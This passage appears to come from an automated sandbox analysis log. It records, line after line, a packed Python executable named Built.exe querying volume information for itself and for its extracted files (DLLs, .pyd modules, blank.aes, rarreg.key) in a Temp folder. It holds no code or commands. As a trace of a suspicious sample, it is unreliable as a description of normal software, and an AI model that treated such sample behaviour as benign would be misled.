                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\python310.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\rarreg.key VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\select.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\sqlite3.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\VCRUNTIME140.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\_ctypes.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\_lzma.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\blank.aes VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\blank.aes VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\blank.aes VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\blank.aes VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\blank.aes VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\blank.aes VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\blank.aes VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\_lzma.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\_bz2.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\_sqlite3.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\_socket.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\select.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\_ssl.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\_hashlib.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\_queue.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
